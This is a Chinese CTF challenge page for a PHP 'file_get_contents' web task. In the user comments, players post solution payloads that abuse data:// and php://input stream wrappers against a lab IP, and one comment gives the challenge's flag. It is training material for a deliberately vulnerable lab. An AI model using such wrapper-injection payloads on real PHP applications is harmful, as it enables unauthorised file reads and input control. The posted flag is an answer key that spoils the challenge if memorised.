file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 3662
提  示:
描  述:
file_get_contents????
评论
Pixelw 4天前

http://117.72.52.127:14185/?ac=bugku&fn=flag.txt

回复 0

nihaozy 4天前

http://117.72.52.127:10268/?ac=example&fn=data://text/plain,example

回复 0

6973lb 12天前

这值4金币?

回复 0

liuguowang75 26天前

/?ac=bugku&fn=flag.txt,想到flag文本了,没想到ac=bugku,哈哈

回复 0

HK1ng 1月前

file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。

回复 0

goodsnack 1月前

post ac=1&fn=php://input raw里填1,对应ac的值

回复 0

Zhumeng 5月前

看到file_get_getcontents就要想到伪协议

回复 0

Melancholy 5月前

使用BP POST /?ac=1&fn=php://input HTTP/1.1 参数 1

回复 0

飞天的母猪 6月前

flag{688ebf9ece3756a3a5ac4e16616f1873}

回复 0

xiazhi 7月前

url/?ac=bugku&fn=flag.txt

回复 1

WriteUp

image
harry

3 金币

评分(5)

解题动态

3078029457 攻破了该题 18小时前
yy56 攻破了该题 20小时前
17365151046 攻破了该题 21小时前
www111111 攻破了该题 21小时前
FireBreathingDragon 攻破了该题 1天前
shuiniu221 攻破了该题 2天前
Sharon 攻破了该题 2天前
夜梦 攻破了该题 2天前
oskosk1319 攻破了该题 2天前
陷阱带泛约律 攻破了该题 2天前
李欣 攻破了该题 2天前
FisXan 攻破了该题 4天前
Pixelw 攻破了该题 4天前
nihaozy 攻破了该题 4天前
shark7 攻破了该题 5天前
wrdhv 攻破了该题 5天前
13478372533 攻破了该题 6天前
admin43r4r 攻破了该题 6天前
18233107667 攻破了该题 7天前
小王同学 攻破了该题 7天前
问题反馈